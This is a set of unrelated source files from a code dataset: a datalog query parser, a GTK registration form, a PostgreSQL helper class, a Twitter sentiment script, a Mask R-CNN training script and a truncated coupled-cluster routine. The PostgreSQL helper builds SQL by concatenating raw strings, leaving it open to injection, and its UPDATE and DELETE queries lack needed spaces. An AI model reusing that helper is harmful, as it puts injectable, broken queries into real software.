self.conditions = q0['condition'] # ['orders.orderid > 1000', 'orders.numunits > 1']\n\n tables = q0['table'] # ['orders(numunits, customerid, orderid)', 'customers(firstname, customerid)', 'orderlines(billdate, orderid)']\n\n self.source_tables = {}\n self.table_columns = {}\n self.table_column_idx = {}\n self.column_to_table = {}\n self.resolveSourceTables(tables)\n self.return_columns = self.getReturnColumns(self.result) #numunits, firstname, billdate\n\n self.join_columns = self.getJoinColumns(self.table_columns)\n self.table_conditions = self.getTableConditions(self.conditions)\n #self.resolveNegation()\n\n self.groupby = None\n self.aggregation = None\n self.resolveAggregation(q0['groupby'])\n self.limit = q0.get('limit', None)\n\n self.validate()\n\n def resolveAggregation(self, groupby):\n ''' 'groupby': { 'key': 'pid', 'aggregation': ['count(oid, total_orders)', 'sum(price, total_value)']},'''\n if not groupby: return\n if 'key' not in groupby or 'aggregation' not in groupby:\n print(\"groupby must be dict of {key: ..., aggregation: ...}\\n\")\n exit(1)\n groupkey,aggs = groupby['key'], groupby['aggregation']\n source,table = list(self.column_to_table[groupkey].items())[0]\n self.groupby = {'source': source, 'table':table, 'column': groupkey}\n \n self.aggregation = {}\n for agg in aggs:\n match = re.search(\"(\\S+)\\((\\S+),(\\S+)\\)\", re.sub(\"\\s\", '', agg))\n if match:\n func,src_col,tgt_col = match.group(1), match.group(2), match.group(3)\n self.aggregation[tgt_col] = (func, src_col)\n\n def validate(self):\n return True\n #for col in self.return_columns:\n # if col not in self.column_to_table:\n # raise Exception(\"return column '{}' in header doesn't exist in body!\".format(col))\n\n def resolveSourceTables(self, tables):\n self.source_tables = {}\n self.column_to_table = {}\n for table in tables:\n match = re.search(\"(\\w+)\\.(\\w+)\\((.*)\\)\", table)\n if not match:\n print(\"datalog table '{}' must follow pattern .
  • (col1, col2, ...)\\n\".format(table))\n exit(1)\n source, tablename, str_columns = match.group(1), match.group(2), match.group(3)\n self.table_column_idx[tablename] = {}\n if source not in self.source_tables: self.source_tables[source] = []\n self.source_tables[source].append(tablename)\n self.table_columns[tablename] = re.sub('\\s','', str_columns).split(',')\n for idx,col in enumerate(self.table_columns[tablename]):\n self.table_column_idx[tablename][col] = idx\n if col not in self.column_to_table: self.column_to_table[col] = {}\n self.column_to_table[col][source] = tablename\n\n # Given a datalog query of form - \"Ans(numunits, firstname, billdate), orders.orderid > 1000, orders.numunits > 1\"\n # this method extracts the column names from it\n def getReturnColumns(self, datalog):\n return [col.strip() for col in datalog[(datalog.index(\"(\")+1): datalog.index(\")\")].split(\",\")]\n\n # Dictionary of {numunits:orders, customerid:orders;customers} etc.\n def getJoinColumns(self, table_columns):\n col_map = {}\n for table,columns in table_columns.items():\n for col in columns:\n if col == '_': continue\n if col in col_map:\n col_map[col].append(table)\n else:\n col_map[col] = [table]\n\n return {col: col_map[col] for col in col_map if len(col_map[col]) > 1}\n\n def getTableConditions(self, conditions):\n cond_map = {}\n for cond in conditions:\n match = re.search(\"(\\S+)\\s*([>=<]+)\\s*(.+)\", cond)\n if not match:\n print(\"bad condition pattern: {}\".format(cond))\n exit(1)\n lop, op, rop = match.group(1), match.group(2), match.group(3)\n # HACK: suppose only 1 operand is column, and pure column in condition \n tables = []\n #match = re.search(\"(\\w+)\\.(\\w+)\", lop)\n #if match: lop = match.group(2)\n #match = re.search(\"(\\w+)\\.(\\w+)\", rop)\n #if match: rop = match.group(2)\n\n if lop in self.column_to_table:\n source_tables = self.column_to_table[lop]\n else:\n source_tables = self.column_to_table[rop]\n\n for source,table in source_tables.items():\n if source not in cond_map: cond_map[source] = {}\n if table not in cond_map: cond_map[source][table] = []\n cond_map[source][table].append([lop, op, rop])\n return cond_map\n\n def resolveNegation(self):\n negation_map = {}\n negation_values = {}\n for val in self.conditions:\n match = re.search('not (\\S+)\\((.*)\\)', val)\n if not match: continue\n table, columns = match.group(1), match.group(2)\n for idx, col in enumerate(columns.split(',')):\n match = re.search('\"(.*)\"', col)\n if match:\n negation_map[table+':'+str(idx)] = match.group(1)\n continue\n match = re.search('(\\d+)', col)\n if match:\n negation_map[table+':'+str(idx)] = match.group(1)\n\n for key,neg_value in negation_map.items():\n table, idx = key.split(':')\n negation_values[table] = { self._table_columns[table][int(idx)]: neg_value}\n \n #for table,negs in self.negation_values.items():\n # for n,v in negs.items():\n # self.conds.append(\"{}.{} != '{}'\".format(table, n, v))\n\n","sub_path":"query_capability/datalog_parser.py","file_name":"datalog_parser.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"303016329","text":"#!/usr/bin/env python\n#-*- encoding: utf-8 -*-\n\n\n#Author: Pedro Jefferson\n#Email: pedrojefferson.developer@gmail.com\n#Twitter: _pedrojefferson\n#Github: 1pedro\n \nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nimport sqlite3\n\n \nclass Main(Gtk.Window):\n def __init__(self):\n #Main Window\n Gtk.Window.__init__(self, title=\"SCU - Sistema de Cadastro de Usuários\")\n Gtk.Window.set_size_request(self,600,600)\n Gtk.Window.set_resizable(self,False)\n Gtk.Window.modify_bg(self,Gtk.StateType.NORMAL,Gdk.color_parse(\"#FFFFFF\"))\n\t\t#Main Grid Creation\n self.grid_total = Gtk.Grid()\n self.add(self.grid_total)\n\t\t#Label Grid(grid1) \n self.grid1 = Gtk.Grid()\n\t\t#Box\n self.box1 = Gtk.Box()\n self.grid1.attach(self.box1,0,0,1,1)\n self.labelinit = Gtk.Label()\n INITTEXT = \"\"\"\\nSistema de Cadastro de Usuários\\n\"\"\"\n self.labelinit.set_markup(INITTEXT)\n self.box1.pack_start(self.labelinit,expand=True,fill=True,padding=40)\n self.grid2 = Gtk.Grid(column_homogeneous=True,column_spacing=1,row_spacing=10)\n\t\t#Label e entry Nome\n self.label_nome = Gtk.Label(label=\"Nome Completo *\")\n self.label_nome.set_halign(Gtk.Align.END) \n self.grid2.attach(self.label_nome,0,0,1,1)\n self.entry_nome = Gtk.Entry()\n self.entry_nome.set_max_length(150)\n self.entry_nome.set_width_chars(30) \n self.entry_nome.set_halign(Gtk.Align.START)\n self.grid2.attach(self.entry_nome, 1,0,1,1)\n self.entry_nome.connect(\"changed\",self.on_entry_nome_changed)\n\t\t#Label e entry do CPF\n self.label_cpf = Gtk.Label(label=\"CPF *\")\n self.label_cpf.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_cpf,0,3,1,1)\n self.entry_cpf = Gtk.Entry()\n self.entry_cpf.set_max_length(max=11)\n self.entry_cpf.set_width_chars(11)\n self.entry_cpf.set_halign(Gtk.Align.START)\n self.grid2.attach(self.entry_cpf,1,3,1,1)\n\t\t#Telefone\n self.label_tel = Gtk.Label(label=\"Tel \")\n self.label_tel.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_tel,0,4,1,1)\n self.entry_tel = Gtk.Entry()\n self.grid2.attach(self.entry_tel,1,4,1,1)\n self.entry_tel.set_max_length(max=17)\n self.entry_tel.set_width_chars(17)\n self.entry_tel.set_halign(Gtk.Align.START)\n self.entry_tel.set_text(\"+99 99 999999999\")\n self.entry_tel.modify_fg(Gtk.StateType.NORMAL,Gdk.color_parse(\"#999999\"))\n\t\t#Email\n self.label_email = Gtk.Label(label=\"Email \")\n self.label_email.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_email,0,5,1,1)\n self.entry_email = Gtk.Entry()\n self.grid2.attach(self.entry_email,1,5,1,1)\n self.entry_email.set_max_length(80)\n self.entry_email.set_halign(Gtk.Align.START)\n\t\t#Data de Nascimento\n self.label_nasc = Gtk.Label(label=\"Data de Nascimento *\")\n self.label_nasc.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_nasc,0,6,1,1)\n self.entry_nasc = Gtk.Entry()\n self.entry_nasc.set_max_length(12)\n self.entry_nasc.set_width_chars(12)\n self.entry_nasc.set_halign(Gtk.Align.START)\n self.grid2.attach(self.entry_nasc,1,6,1,1)\n self.entry_nasc.set_text(\"DD/MM/YYYY\")\n self.entry_nasc.modify_fg(Gtk.StateType.NORMAL,Gdk.color_parse(\"#999999\"))\n\t\t#Estado\n self.combo = Gtk.ComboBoxText()\n self.label_combo = Gtk.Label(label=\"Estado *\")\n self.label_combo.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_combo,0,7,1,1)\n self.combo.insert(0,\"0\", \"Bahia\")\n self.combo.insert(1,\"1\", \"São Paulo\")\n self.combo.insert(2,\"2\", \"Minas Gerais\")\n self.combo.insert(3,\"3\", \"Rio de Janeiro\")\n self.combo.insert(4,\"4\", \"Tocantins\")\n self.combo.insert(5,\"5\", \"Mato Grosso do Sul\")\n self.combo.insert(6,\"6\", \"Pernambuco\")\n self.combo.set_halign(Gtk.Align.START)\n self.grid2.attach(self.combo, 1,7,1,1)\n\t\t#Cidade\n self.combo2 = Gtk.ComboBoxText()\n self.label_combo2 = Gtk.Label(label=\"Cidade *\")\n self.label_combo2.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_combo2,0,8,1,1)\n self.combo2.insert(0,\"0\",\"Camaçari\")\n self.combo2.insert(1,\"1\",\"Dias D'vila\")\n self.combo2.insert(2,\"2\",\"Vila de Abrantes\")\n self.combo2.insert(3,\"3\",\"Salvador\")\n self.combo2.set_halign(Gtk.Align.START)\n self.grid2.attach(self.combo2,1,8,1,1)\n\t\t#Comit\n self.comit = Gtk.Button(label=\"Gravar\")\n self.comit.set_halign(Gtk.Align.CENTER)\n self.grid_total.attach(self.comit,0,2,2,2)\n self.comit.set_size_request(100,40)\n self.comit.connect(\"clicked\", self.on_comit_clicked)\n\t\t#Ajustando as Grids\n self.grid2.set_row_spacing(10)\n self.grid1.set_row_spacing(10)\n\t\t#Licensa, Autoria\n self.box3 = Gtk.Box()\n LIC = \"\"\"Developed by: Pedro Jefferson\\n Blog: peddroblog.wordpress.com \\n Email: peddro.jeff@gmail.com\" \"\"\"\n self.label_lic = Gtk.Label()\n self.label_lic.set_markup(LIC)\n self.box3.pack_start(self.label_lic,expand=True,fill=True,padding=20)\n \t\t#Colocando Grid1 e Grid2 na grid total \n self.grid_total.set_row_spacing(30)\n self.grid_total.attach(self.grid1, 0,0,2,1)\n self.grid_total.attach(self.grid2, 0,1,1,1)\n self.grid_total.attach(self.box3, 0,10,1,1)\n \n \n def on_entry_nome_changed(self, widget):\n nome = widget.get_text()\n nome = nome.upper()\n return widget.set_text(nome)\n \n \n def on_comit_clicked(self, widget):\n nome = self.entry_nome.get_text()\n cpf = self.entry_cpf.get_text()\n data_nasc = self.entry_nasc.get_text()\n estado = self.combo.get_active_text()\n cidade = self.combo2.get_active_text()\n tel = self.entry_tel.get_text()\n email = self.entry_email.get_text()\n \n if nome != None and cpf != None and data_nasc != None \\\n and estado != None and cidade != None:\n return comit_dados(None,nome,cpf, tel, email, data_nasc,estado,cidade)\n pass\n \n \ndef comit_dados(*args):\n connection = sqlite3.connect('cadastro.db')\n connection.text_factory = str\n c = connection.cursor()\n c.execute('CREATE TABLE IF NOT EXISTS dados (_id integer , nome text, cpf integer, tel varchar(17), email varchar(150), data_nasc varchar(12), estado varchar(30), cidade varchar(30))')\n c.execute('INSERT INTO dados (_id ,nome, cpf, tel, email, data_nasc, estado, cidade) VALUES (?,?,?,?,?,?,?,?)', (args))\n connection.commit()\n \n\nwin = Main()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\n\n","sub_path":"form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"515416801","text":"#-*- coding: utf-8 -*-\nimport psycopg2\n\n\nclass PostgreSQL:\n def __init__(self, log, ip, db, user, password, port=5432):\n self._log_ = log\n if self._log_ is None:\n print(\"'Log' should not be empty.\")\n exit(1)\n self._conn_string_ = \"host='\" + ip + \"' dbname ='\" + db + \"' user='\" + user + \"' password='\" + password + \\\n \"' port='\" + str(port) + \"'\"\n self._conn_ = None\n self._cursor_ = None\n\n def is_conn(self):\n try:\n self._conn_ = psycopg2.connect(self._conn_string_)\n self._conn_.set_client_encoding('UTF8')\n self._cursor_ = self._conn_.cursor()\n return True\n except Exception as e:\n print(\"postgresql database connection error : \", e)\n return False\n\n def select(self, table, col=None, option=None):\n if table is None or table == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n column = \"*\" if col is None or col == \"\" else col\n option = \"\" if option is None or option == \"\" else \" WHERE \" + option\n sql = \"SELECT array_to_json(array(SELECT row_to_json(tmp) FROM (\" \\\n \"SELECT \" + column + \" FROM \" + table + option + \") tmp));\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return self._cursor_.fetchall()[0][0]\n else:\n return None\n\n def insert(self, table, values, col=None):\n if table is None or table == \"\" or values is None or values == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n col = \"\" if col is None else \"(\" + col + \")\"\n sql = \"INSERT INTO \" + table + col + \" VALUES (\" + values + \");\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return True\n else:\n return False\n\n def update(self, table, sets, options=None):\n if table is None or table == \"\" or sets is None or sets == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n options = \"\" if options is None else \"WHERE \" + options + \"\"\n sql = \"UPDATE \" + table + \"SET \" + sets + options + \";\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return True\n else:\n return False\n\n def delete(self, table, options=None):\n if table is None or table == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n options = \"\" if options is None else \"WHERE \" + options + \"\"\n sql = \"DELETE FROM \" + table + options + \";\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return True\n else:\n return False","sub_path":"deepgeo/src/deepGeoPgsql.py","file_name":"deepGeoPgsql.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"108615686","text":"# In this assignment you must do a Twitter search on any term\n# of your choice.\n# Deliverables:\n# 1) Print each tweet\n# 2) Print the average subjectivity of the results\n# 3) Print the average polarity of the results\n\n# Be prepared to change the search term during demo.\n\nimport tweepy\nfrom textblob import TextBlob\nimport sys \n\n# Unique code from Twitter\n\n\n# Boilerplate code here\nauth = tweepy.OAuthHandler(consumer_key,consumer_secret)\nauth.set_access_token(access_token,access_token_secret)\n\n#Now we can Create Tweets, Delete Tweets, and Find Twitter Users\napi = tweepy.API(auth)\nprint (\"------------------------------------------------------------------\")\nsearch_topic = input(\"Please enter a Twitter search topic of your choice: \")\nprint (\"------------------------------------------------------------------\")\npublic_tweets = api.search(search_topic)\ntotal_subjectivity = 0\ntotal_polarity = 0\nt_sub = 0\nt_pol = 0\n\nprint (\"TWEETS ABOUT\", search_topic.upper(), \":\")\n\n#Creating a for loop to count the total number of tweets and get its respective polarity and subjectivity scores\nfor tweet in public_tweets:\n\tprint (tweet.text)\n\tanalysis = TextBlob(tweet.text)\n\tt_sub += analysis.sentiment.subjectivity\n\tt_pol += analysis.sentiment.polarity\n\ttotal_subjectivity += 1\n\ttotal_polarity += 1\n\nprint (\"*******************************************\")\n#Calculating and printing out the average subjectivity and polarity scores of the collected tweets\navg_subjectivity = t_sub/total_subjectivity\navg_polarity = t_pol/total_polarity\nprint(\"Average subjectivity is\", avg_subjectivity)\nprint(\"Average polarity is\", avg_polarity)\nprint (\"*******************************************\")\n\n","sub_path":"twitterhw3b.py","file_name":"twitterhw3b.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"349557075","text":"import os\nimport numpy as np\nimport torch\nimport torch.utils.data\nfrom PIL import Image, ImageOps\nimport torchvision\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nfrom engine import train_one_epoch, evaluate\nimport utils\nimport transforms as T\n\npath = '/home/yonga/keremWorkSpace/CancerCellsCounterWithMaskR-Cnn/Dataset'\n\ndatasetSize= 0\nclass PennFudanDataset(torch.utils.data.Dataset): \n # Dataseti oluşturan onu modifiye eden sınıf\n def __init__(self, root, transforms=None): # yapıcı method\n global datasetSize\n self.root = root# root : dataset için resimlerin yolu \n self.transforms = transforms #Bu transforms.py dosyasından çektiğimiz Compose sınıfı, amacı dataseti modifiye etmek.\n\n self.imgs = list(sorted(os.listdir(os.path.join(root, \"images\")))) #bütün orjinal resimlerin isim listesi\n self.masks = list(sorted(os.listdir(os.path.join(root, \"masks\")))) # bütün maskelerin isim listesi\n \"\"\"\n #Burada Elimde olan Gpu ile alabildiğim maksimum dataset boyutu 444 orjinal resim olduğu için geriye kalanları listeden siliyorum.\n theValue = 100\n del self.imgs[theValue:] \n del self.masks[theValue:] \n \"\"\"\n datasetSize = len(self.imgs)\n def __getitem__(self, idx): #Bu method pennfudandataset sınıfına ait bir nesnenin döndürülmesi halinde çağırılan özel bir methoddur.\n # imageleri ve maskeleri değişkenlere atar\n img_path = os.path.join(self.root, \"images\", self.imgs[idx])\n mask_path = os.path.join(self.root, \"masks\", self.masks[idx])\n #idx değişkeni veriseti dönerken kendiliğinden artan indextir.Yani veriseti listesinin boyutu kadar döner.\n\n img = Image.open(img_path).convert(\"RGB\") # Image operatörü PIL tipinde bir resime erişmek içindir.Burada-\n #yolunu verdiğimiz her tek resim için img değişkenine bir tane resim atanır ve bu resmi rgb formatına çeviririz.\n mask = Image.open(mask_path)#aynı şeyi maskeler için yapıyoruz fakat!, maskeleri rgb ye çevirmiyoruz çünkü her ayrı renk-\n #pikseli ayrı bir blob'a denk gelecek şekilde ayarlandığı için greyscale kalmalı!\n\n mask = np.array(mask)\n # maskeyi numpy array şekline çeviriyoruz\n\n obj_ids = np.unique(mask) # burada dizide olan eleman çeşidini görmek için np.uniqiue methodunu kullanıyoruz.\n #yani bunun içeriği 3 tane blob var ise arkaplan dahil olmak üzere 4 tane eleman olacak ([0,1,2,3]).\n # aynı zamanda np.unique methodu verileri küçükten büyüğe sıralar.\n\n \n obj_ids = obj_ids[1:] # ilk eleman arkaplan olduğundan onu siliyoruz.\n\n masks = mask == obj_ids[:, None, None]#blobların olduğu pikselleri True , olmadığı pikselleri false yaparak masks numpy dizisini ayarlıyoruz\n\n\n # her maskenin bounding box koordinatlarını alma aşaması : \n num_objs = len(obj_ids) # blob sayısını num_objs değişkenine setler.\n boxes = []\n for i in range(num_objs):\n pos = np.where(masks[i])# masks dizisindeki true olan(yani blobun olduğu x ve y koordinatı) x dizisi ve y dizisi olarak döndürür-\n #ve bu iki diziyi pos'a setler\n xmin = np.min(pos[1])\n xmax = np.max(pos[1])\n ymin = np.min(pos[0])\n ymax = np.max(pos[0])\n #x ve y koordinatlarının max ve min değerlerini değişkenlere atar.-\n # Bu değişkenler bizim bounding box dikdörtgenin köşegen koordinatlarıdır.\n boxes.append([xmin, ymin, xmax, ymax])#sonunda boxes'dizisine eleman olarak verilir.\n\n boxes = torch.as_tensor(boxes, dtype=torch.float32)#boxes dizisini torch.float32 tipinde bir tensor'a çevirdik\n # there is only one class\n labels = torch.ones((num_objs,), dtype=torch.int64) #blob sayısını labels adındaki diziye atıyoruz.-\n #Bu dizide blob sayısı kadar eleman olsa ve bunların hepsi 1 olsa yeterlidir.Çünkü sadece 1 etiketimiz var.\n masks = torch.as_tensor(masks, dtype=torch.uint8) #maskelerimizide tensor'a çeviriyoruz.\n\n image_id = torch.tensor([idx])# idx değerini bir nevi image_id olarak tutuyoruz(amaç resmin idx'ine erişebilme)\n\n area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0]) # bounding box'un alanını buluyoruz.\n\n #print('ALAN ================== ' ,area)\n \n # suppose all instances are not crowd\n iscrowd = torch.zeros((num_objs,), dtype=torch.int64)#blob sayısı kadar 0 matrisi oluşturur\n\n #şimdi tüm bu özelliklerimizi target adında bir listeye atalım.\n target = {}\n target[\"boxes\"] = boxes\n target[\"labels\"] = labels\n target[\"masks\"] = masks\n target[\"image_id\"] = image_id\n target[\"area\"] = area\n target[\"iscrowd\"] = iscrowd\n \n #Bu if blogunda dataset'deki veriler modifiye edilecekse yani bir transforms değişkenimiz içerisinde objemiz var ise\n if self.transforms is not None:\n img, target = self.transforms(img, target)#img ve target'i modifiye et\n\n return img, target\n\n def __len__(self):\n return len(self.imgs)#veri setindeki resimlerin sayısını döndürür.\n \ndef get_instance_segmentation_model(num_classes):# pretrained modeli döndüren method\n #num_classes'ı aşağıda 2 vereceğiz-\n #2 vermemizin sebebi 1 etiketimizin bloblar diğer etiketimizin arkaplan olmasıdır.\n # load an instance segmentation model pre-trained on COCO\n model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)\n #Burada torchvision models üzerinden maskrcnn_resnet50_fpn modelimizi indiriyoruz\n\n\n # get the number of input features for the classifier\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n # replace the pre-trained head with a new one\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\n # now get the number of input features for the mask classifier\n in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels\n hidden_layer = 256\n # and replace the mask predictor with a new one\n model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n hidden_layer,\n num_classes)\n\n return model\n\ndef get_transform(train):#Burada penfudandataset'e verdiğimiz transforms objemizin özelliklerini belirliyoruz\n transforms = []\n transforms.append(T.ToTensor())# PIL image 'i Pytorch Tensoruna çevirme özelliğini verdik\n if train:\n \n transforms.append(T.RandomHorizontalFlip(0.5))#resimleri rassal olarak döndürmesini sağlıyoruz\n #amacımız tabiki veri setinin çeşitliliğini arttırmak\n return T.Compose(transforms)\n\n# dataseti tanımlıyoruz ve resimleri modifiye etmesini istiyoruz\ndataset = PennFudanDataset(path, get_transform(train=True))\ndataset_test = PennFudanDataset(path, get_transform(train=False))\n\ndatasetTestSize = int((datasetSize*30)/100)\n\nprint('Dataset Test Boyutu : ', datasetTestSize)\nprint('Dataset Eğitim Boyutu : ', datasetSize-datasetTestSize)\n\n# dataseti ve test için kullanılacak dataseti ayarlıyoruz\ntorch.manual_seed(1)\nindices = torch.randperm(len(dataset)).tolist()\ndataset = torch.utils.data.Subset(dataset, indices[:-datasetTestSize])\ndataset_test = torch.utils.data.Subset(dataset_test, indices[-datasetTestSize:])\n#dataseti kardık ve teste 50 veri, geriye kalan veriyide datasetimize aktardık.\n\n# training ve validation için dataloaderı ayarlıyoruz\ndata_loader = torch.utils.data.DataLoader(\n dataset, batch_size=3, shuffle=True, num_workers=0,\n collate_fn=utils.collate_fn)\n\ndata_loader_test = torch.utils.data.DataLoader(\n dataset_test, batch_size=1, shuffle=False, num_workers=0,\n collate_fn=utils.collate_fn)\n#buradaki num_workers değeri eğitimi threadlere bölüyor.\n#Eğer bir tane ekran kartımız var ise bunları 0 yapmalıyız\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n#device = torch.device('cpu')\n#Çalıştırılacak cihaz olarak uygunsa Gpu çalışması için cuda, uygun değilse cpu ayarlamasını sağlıyoruz.\n\nnum_classes = 2 #Daha öncede açıkladığım gibi 2 tane sınıfımız var biri arkaplan biri blob etiketimiz.\n\n#pretrained modelimizi çekiyoruz\nmodel = get_instance_segmentation_model(num_classes)\n# modele uygun cihazda çalışması için bildiri yapıyoruz\nmodel.to(device)\n\n# optimizer yapıcısı\nparams = [p for p in model.parameters() if p.requires_grad]\n\n#optimizer = torch.optim.SGD(params, lr=0.005, momentum=0.9, weight_decay=0.0005)\noptimizer =torch.optim.Adamax(params, lr=0.002, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\n# and a learning rate scheduler which decreases the learning rate by\n# 10x every 3 epochs\nlr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer,\n step_size=3,\n gamma=0.1)\n\n# 3 epoch eğiticez\nnum_epochs = 1000\n\n#Eğitimimizin başladığı bölüm\nfor epoch in range(num_epochs):\n # 1 epoch eğitim her epochu ekrana bastıran method\n train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq=100)\n\n\n # learning rate'i güncelliyoruz\n lr_scheduler.step()\n\n # dataset_test ile test yaptığımız kısım\n evaluate(model, data_loader_test, device=device)\n\n if epoch % 10 ==0:\n filePath = '/home/yonga/keremWorkSpace/CancerCellsCounterWithMaskR-Cnn/TrainAndPrediction//maskRCNN_model_'+str(epoch)+'.h5'\n torch.save(model.state_dict(), filePath)\n\n\n#burada modelimizi daha sonra kullanmak için dışarıya kaydediyoruz\ntorch.save(model, \"/home/yonga/keremWorkSpace/CancerCellsCounterWithMaskR-Cnn/TrainAndPrediction/modelv1.h5\")\n\n\n\n\n\"\"\"\n#burada kaydettiğimiz modeli kullanmak için onu dışarıdan çağırıyoruz\nsavedmodel = torch.load(\"/home/yonga/keremWorkSpace/BalıkSayma/FishCounterWithMaskRCNN/model.h5\")\n#modeli evalation moduna alıyoruz burada device belirtmemiz gerekmedi bunu araştırmam gerekiyor\n#kodumuz sorunsuz bir şekilde gpu 'da çalışıyor sanırım önceden modeli gpuda çalışacak şekilde-\n#kaydettiğimiz için.\nsavedmodel.eval()\n\nimport torchvision.transforms as trans #torchvision'un transforms.py dosyasını çekiyoruz\n\n\n#Burada transforms'un ne yapacağını ona söylüyoruz\nloader = trans.Compose([trans.ToTensor()])#loader resmi PIL image'den tensora çeviriyor\n\nunloader = trans.ToPILImage() # unloader ise resmi tensordan PIL image'e çeviriyor\n\n\n#Bu method image'i PIL image tipinde açar ve bunu tensor'a çevirir\ndef image_loader(image_name):\n image = Image.open(image_name)\n image = loader(image)\n return image\n\n#resmimizin yolu\np = \"/home/yonga/keremWorkSpace/BalıkSayma/FishCounterWithMaskRCNN/Basler_raL2048-48gm__22248034__20181106_144201677_0114.tiff\"\n\n\ntahminResmi = image_loader(p)\ntorch.cuda.empty_cache()#gpu'nun cache'ini temizler, yer açar\n\nimport time\nstart = time.process_time()\nwith torch.no_grad():\n prediction = savedmodel([tahminResmi.to(device)])\nprint(time.process_time() - start)\n\nprint(prediction[0]['masks'].shape)\n\"\"\"","sub_path":"TrainAndPrediction/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"436561028","text":"import psi4\nimport numpy as np\nimport sys \nsys.path.append('.')\nfrom uhf import compute_uhf\nfrom tools import *\nimport time\n\ndef show_progress(timings, printif):\n\n # Function to display the progress of computation setup\n\n if len(timings) > 0 and printif == print:\n sys.stdout.write(\"\\033[F\"*5)\n\n tasks = \"\"\"\n Building:\n \\U0001F426 Spin-Orbital arrays {} \n \\U0001F986 MO integrals {}\n \\U0001F9A2 D[ijab] {}\"\"\"\n\n x = []\n for t in timings:\n x.append(emoji('check') + ' ' + '{:10.5f} seconds'.format(t))\n\n while len(x) < 3:\n x.append('')\n\n printif(tasks.format(*x))\n\ndef CCD_Energy(T, V):\n\n return (1/4)*np.einsum('mncd, mncd -> ', V, T, optimize='optimal')\n\ndef CCD_Amplitude(T, D, Voovv, Voooo, Vvvvv, Vvoov):\n\n newT = np.zeros(T.shape)\n\n # 1st Diagram\n newT += Voovv\n\n # 2nd Diagram\n newT += 0.5*np.einsum('cdab, ijcd -> ijab', Vvvvv, T, optimize='optimal')\n\n # 3rd Diagram\n newT += 0.5*np.einsum('ijkl, klab -> ijab', Voooo, T, optimize='optimal')\n\n # 4th Diagram \n X = np.einsum('cjkb, ikac -> ijab', Vvoov, T, optimize='optimal')\n newT += X - X.transpose(1,0,2,3) - X.transpose(0,1,3,2) + X.transpose(1,0,3,2)\n\n # 5th Diagram\n newT += 0.25*np.einsum('klcd, klab, ijcd -> ijab', Voovv, T, T, optimize='optimal')\n\n # 6th Diagram\n X = np.einsum('klcd, ikac, ljdb -> ijab', Voovv, T,T, optimize='optimal')\n #newT += X - X.transpose(0,1,3,2) - X.transpose(1,0,2,3) + X.transpose(1,0,2,3)\n newT += X - X.transpose(1,0,2,3)\n\n # 7th Diagram\n X = np.einsum('klcd, klca, ijdb -> ijab', Voovv, T, T, optimize='optimal')\n newT += -0.5*(X - X.transpose(0,1,3,2))\n\n # 8th Diagram\n X = np.einsum('klcd, kicd, ljab -> ijab', Voovv, T, T, optimize='optimal')\n newT += -0.5*(X - X.transpose(1,0,2,3))\n\n newT *= D\n\n rms = np.sqrt(np.sum(np.square(newT - T)))/(T.size)\n\n return newT, rms\n\ndef compute_CCD(Settings, silent=False, compare=True):\n\n t0 = time.time()\n\n printif = print if not silent else lambda *k, **w: None\n\n Escf, Ca, Cb, epsa, epsb, _, g, Vnuc = compute_uhf(Settings, return_C=True, return_integrals=True, silent=silent)\n \n printif(\"\"\"\n =======================================================\n Spin-Orbital Coupled Cluster Doubles \n {}\n =======================================================\n \"\"\".format('\\U0001F9D9'))\n\n tsave = []\n show_progress(tsave, printif)\n t = time.time()\n\n # Create Spin-Orbital arrays\n C = np.block([\n [Ca, np.zeros(Ca.shape)],\n [np.zeros(Cb.shape), Cb]\n ]) \n\n eps = np.concatenate((epsa, epsb)) \n\n g = np.kron(np.eye(2), g)\n g = np.kron(np.eye(2), g.T)\n\n\n # re-Sorting orbitals\n s = np.argsort(eps)\n eps = eps[s]\n C = C[:,s]\n\n tsave.append(time.time() - t)\n show_progress(tsave, printif)\n t = time.time()\n \n # Get the MO integral\n\n nelec = Settings['nalpha'] + Settings['nbeta']\n # Converto to Physicists notation\n g = g.transpose(0,2,1,3)\n # Antisymmetrize\n g = g - g.transpose(0,1,3,2)\n\n # Save Slices\n ERI = lambda a,b,c,d: np.einsum('ap,bq,cr,ds,abcd->pqrs', 